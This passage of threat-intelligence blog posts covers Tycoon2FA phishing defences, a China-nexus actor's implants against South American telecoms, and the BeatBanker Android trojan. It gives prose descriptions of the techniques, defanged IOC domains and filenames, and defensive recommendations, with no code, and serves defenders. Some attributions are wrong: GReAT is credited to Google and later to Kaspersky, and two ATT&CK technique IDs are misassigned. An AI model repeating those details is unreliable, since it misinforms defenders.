To defend against sophisticated AiTM phishing kits like Tycoon2FA, organizations must move beyond simple password hygiene and adopt a defense-in-depth strategy.

1. Monitor for Session Persistence: Since Tycoon2FA captures valid session cookies, monitor for login activity from unusual geographic locations or at odd hours immediately following a password reset or user flagging.

2. Implement Conditional Access Policies: Enforce policies that require risk assessment before granting access. For example, block access from unrecognized devices or locations, even if MFA is present.

3. Review User Training: Educate users on the nuances of AiTM attacks. Users should be wary of URL discrepancies and should verify the domain authenticity before entering credentials.

4. Leverage Phishing Detection Tools: Deploy solutions that inspect email links and URLs before they reach the inbox, specifically targeting the obfuscated domains and URL structures used by these kits.

References

• Inside Tycoon2FA: How a leading AiTM phishing kit operated at scale by Microsoft Threat Intelligence and Microsoft Defender Security Research Team, Microsoft Security Blog (March 4, 2026)

Cisco Talos has disclosed a sophisticated campaign attributed to UAT-9244, a China-nexus Advanced Persistent Threat (APT) actor closely associated with the "Famous Sparrow" group. Since 2024, this threat actor has focused its efforts on critical telecommunications infrastructure across South America, utilizing a multi-stage infection chain involving three distinct malware implants. The campaign targets both Windows and Linux-based endpoints, as well as edge devices, utilizing techniques such as DLL side-loading, BitTorrent-based command and control (C2), and brute-force scanning.

Threat Analysis

The UAT-9244 campaign is characterized by its targeting of Tier 1 telecommunications providers. The actor employs a multi-layered approach to establish persistence and exfiltrate data. We have identified three primary components in this arsenal: TernDoor, PeerTime, and BruteEntry.

TernDoor: The Windows Backdoor

TernDoor is a Windows-based backdoor that serves as the final payload in the infection chain. Its delivery mechanism relies on DLL side-loading, a technique that allows malware to execute without being directly launched by the user.

The infection chain begins with a benign executable, wsprint[.]exe. This file acts as a dropper, loading a malicious Dynamic Link Library (DLL) named BugSplatRc64[.]dll. Once loaded into memory, this DLL reads a secondary data file, WSPrint[.]dll, decrypts its contents, and executes the payload—TernDoor. This obfuscation technique makes detection difficult for signature-based antivirus solutions, as the malicious activity is hidden behind a seemingly legitimate process.

MITRE ATT&CK Reference:

• T1055.003: Process Injection / DLL Side-Loading

PeerTime: The BitTorrent C2

Perhaps the most innovative aspect of UAT-9244's toolset is the use of "PeerTime," an ELF-based backdoor designed for Linux environments. PeerTime utilizes the BitTorrent protocol to establish and maintain its command and control (C2) channel.

By using BitTorrent, the actor effectively turns the infected host into a node in a decentralized network. This approach provides several advantages: it obscures traffic patterns, bypasses standard firewall rules that block known C2 domains, and utilizes the bandwidth of multiple infected hosts to communicate. The BitTorrent protocol is inherently peer-to-peer, making it difficult for defenders to identify a single point of failure or a specific C2 server.

BruteEntry: Operational Relay Boxes (ORBs)

The third implant, "BruteEntry," is a brute-force scanner deployed on network edge devices. This implant converts compromised routers or firewalls into Operational Relay Boxes (ORBs). These ORBs are then used to scan external networks for vulnerable services, specifically targeting SSH, PostgreSQL, and Apache Tomcat servers.

This strategy amplifies the actor's reach. By controlling edge devices, UAT-9244 can perform lateral movement and reconnaissance from within the internal network, leveraging the edge device's IP address to mask the source of the scans.

MITRE ATT&CK Reference:

• T1110: Brute Force

Indicators of Compromise (IOCs)

SecLookup's threat intelligence platform has analyzed the infrastructure associated with this campaign. The following IOCs have been identified and verified.

Malicious Domains

The following domains have been confirmed as malicious and are being actively blocked by SecLookup.

bloopencil[.]net

Infrastructure Components

The campaign relies on specific infrastructure names for initial infection and payload delivery. Monitoring for these filenames is critical for hunting operations as per Cisco Talos.

wsprint.exe
BugSplatRc64.dll
WSPrint.dll

SecLookup Detection

SecLookup is actively monitoring the threat landscape to protect our users from emerging threats like UAT-9244. Our threat intelligence platform has identified and blocked the malicious domain bloopencil[.]net associated with this campaign.

Recommendations

To defend against the UAT-9244 campaign and similar threats targeting the telecom sector, we recommend the following security measures:

1. Monitor for DLL Side-Loading: Implement file integrity monitoring (FIM) on critical system binaries. Alert on processes attempting to load DLLs from non-standard directories, particularly those named similarly to legitimate system processes.

2. BitTorrent Traffic Monitoring: While BitTorrent is a legitimate protocol, unexpected usage on internal enterprise networks can be a sign of compromise. Monitor for BitTorrent traffic on Linux endpoints and servers, especially from non-standard ports.

3. Harden Edge Devices: Given the use of BruteEntry to convert edge devices into scanners, ensure that edge devices are strictly segmented from the rest of the network. Enforce strong, unique passwords and consider disabling unused services on these devices.

4. SSH and Service Hardening: Since BruteEntry targets SSH, PostgreSQL, and Tomcat, ensure that these services are not exposed to the internet unnecessarily. Implement Multi-Factor Authentication (MFA) for all remote access and enforce key-based authentication for SSH.

5. Suspicious Executable Analysis: The use of wsprint[.]exe as a dropper highlights the risk of benign-looking executables. Restrict execution permissions for unknown or unsigned executables in high-privilege environments.

References

• UAT-9244 targets South American telecommunication providers with three new malware implants by Asheer Malhotra, Cisco Talos

A sophisticated Android-based malware campaign targeting users in Brazil has been identified by GReAT (Google Threat Analysis Group), now known as BeatBanker. This dual-mode Trojan employs a deceptive phishing strategy, masquerading as the official Google Play Store to distribute a malicious application named "INSS Reembolso." Upon installation, the malware reveals a multi-layered attack surface, combining a cryptocurrency miner with a banking Trojan capable of full device hijacking and screen spoofing.

What sets BeatBanker apart from standard banking Trojans is its unique persistence mechanism. To ensure it remains active on the victim's device even after the user attempts to force-stop it, BeatBanker plays an almost inaudible audio file on an infinite loop. This behavior, which prevents the application from being terminated by standard UI actions, inspired the malware's name. Furthermore, the threat actors have demonstrated agility, recently switching from a banking module to a known Remote Access Trojan (RAT) named BTMOB. SecLookup’s threat intelligence platform was actively monitoring these domains, detecting and blocking the malicious infrastructure to protect our users.

Threat Analysis

Infection Vector and Social Engineering

The initial phase of the attack is a classic example of spearphishing via a counterfeit website. The attackers registered the domain cupomgratisfood[.]shop, which mimics the visual design of the Google Play Store. This landing page hosts a malicious application titled "INSS Reembolso."

In Brazil, the Instituto Nacional do Seguro Social (INSS) is a critical government service used by millions for social security tasks, including retirement applications and medical exams. By leveraging this high-trust entity, the attackers increase the likelihood of a download. The "INSS Reembolso" app is not a government tool; it is a repackaged APK containing the BeatBanker payload.

Persistence Mechanism: The "Beat" Loop

Most Android applications can be force-stopped by the user if they are identified as malicious. BeatBanker bypasses this standard defense by utilizing a creative persistence technique. The malware continuously plays an almost inaudible audio file in the background.

Because the Android operating system generally does not allow an application to be terminated if it is actively playing audio, this loop acts as a "lock." Even if a user tries to force-stop the app from the settings menu or kill it via a task manager, the audio playback prevents the termination process from completing. This ensures the malware remains resident on the device, allowing it to execute its other malicious components regardless of user intervention.

Dual-Mode Payload: Banker and Miner

Upon successful installation, BeatBanker deploys a dual-mode payload:

1. Cryptocurrency Miner: The malware utilizes the victim's device resources to mine cryptocurrencies, likely Monero (XMR), generating revenue for the threat actors while draining the device's battery and increasing thermal output.

2. Banking Trojan: This component is designed to steal financial credentials. It utilizes Overlay Attacks (a specific TTP under MITRE ATT&CK [T1566.004: Spearphishing Link]) to impersonate legitimate banking interfaces.

When a victim attempts to make a transaction involving USDT (Tether), BeatBanker injects a transparent overlay on top of the legitimate Binance or Trust Wallet applications. This overlay replaces the destination wallet address with a controlled address owned by the attacker. The user believes they are sending funds to their own wallet, but the funds are actually routed to the threat actor.

Behavioral Monitoring

To optimize its attack and minimize battery drain, BeatBanker includes a set of heuristics to monitor the device state:

• Battery Temperature: The malware checks the device's battery temperature.

• Usage Detection: It determines if the user is actively using the device.

• Execution Logic: The malware is designed to execute specific banking modules or RAT payloads only when the user is idle, ensuring the attack goes undetected during active use.

Evolution: The Shift to BTMOB RAT

In a concerning evolution of the campaign, Kaspersky researchers noted that newer samples of BeatBanker have dropped the banking Trojan component entirely. Instead, these variants now deploy a known RAT called BTMOB. This switch suggests the threat actors are refining their attack strategy, moving from financial theft (banking) to broader system compromise (RAT), which allows for full remote control of the device, data exfiltration, and potential lateral movement within the user's network.

Indicators of Compromise (IOCs)

SecLookup's threat intelligence platform has identified and flagged the following malicious domains associated with the BeatBanker campaign. These domains are confirmed malicious and are being actively blocked.

cupomgratisfood[.]shop

This is the primary phishing domain used to distribute the "INSS Reembolso" application.

bt-mob[.]net

This domain serves as the infrastructure for the BTMOB RAT component. Below is the detailed detection data from SecLookup:

cupomgratisfood[.]shop
bt-mob[.]net

SecLookup Detection

SecLookup is actively detecting this threat. Our platform identified the malicious domains cupomgratisfood[.]shop and bt-mob.net

Recommendations

To protect against threats like BeatBanker, we recommend the following defensive measures:

1. Verify App Sources: Only download applications from the official Google Play Store. Be wary of apps offering government services or "reimbursements" that are not officially hosted on the Play Store.

2. Inspect URLs: Before entering login credentials, verify the URL in the browser bar. Look for subtle misspellings or unusual domain extensions (e.g., using .shop or .top instead of .com).

3. Monitor Background Audio: If your device becomes unusually warm or the battery drains rapidly, check for applications playing audio in the background. A persistent audio file playing silently is a strong indicator of the BeatBanker persistence mechanism.

4. Enable Overlay Prevention: Some modern Android security features allow you to prevent applications from drawing over other apps. Enabling this setting can mitigate the effectiveness of the overlay attacks used to steal wallet addresses.

5. Use Endpoint Detection and Response (EDR): Ensure your mobile security solution includes behavioral monitoring to detect unusual processes attempting to bypass termination or utilize the device's audio subsystem for persistence.

References

• BeatBanker: A dual‑mode Android Trojan by GReAT, Securelist (Kaspersky GReAT)